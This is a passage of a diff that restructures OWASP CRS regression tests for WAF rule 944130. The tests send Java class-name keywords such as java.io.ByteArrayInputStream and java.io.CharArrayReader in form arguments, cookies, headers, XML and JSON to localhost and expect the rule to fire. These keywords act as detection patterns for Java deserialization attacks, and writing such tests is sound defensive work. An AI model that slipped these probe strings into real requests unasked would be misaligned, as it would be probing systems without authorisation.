"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 51 desc: "XML element value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 52 desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 53 desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 54 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 55 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ByteArrayInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 56 desc: "Argument test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 57 desc: "Argument name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 58 desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 59 desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ByteArrayOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 60 desc: "Request header test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 61 desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 62 desc: "XML element value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 63 desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 64 desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 65 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 66 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 67 desc: "Argument test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_id: 68 desc: "Argument name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader=test" + output: + log_contains: "id \"944130\"" + - test_id: 69 desc: "Cookie test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.CharArrayReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.CharArrayReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 70 desc: "Cookie name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.CharArrayReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.CharArrayReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 71 desc: "Request header test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.CharArrayReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.CharArrayReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 72 desc: "XML attribute value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 73 desc: "XML element value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_id: 74 desc: "Nested XML element value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_id: 75 desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_id: 76 desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.CharArrayReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.CharArrayReader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 77 desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.CharArrayReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.CharArrayReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 78 desc: "Argument test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 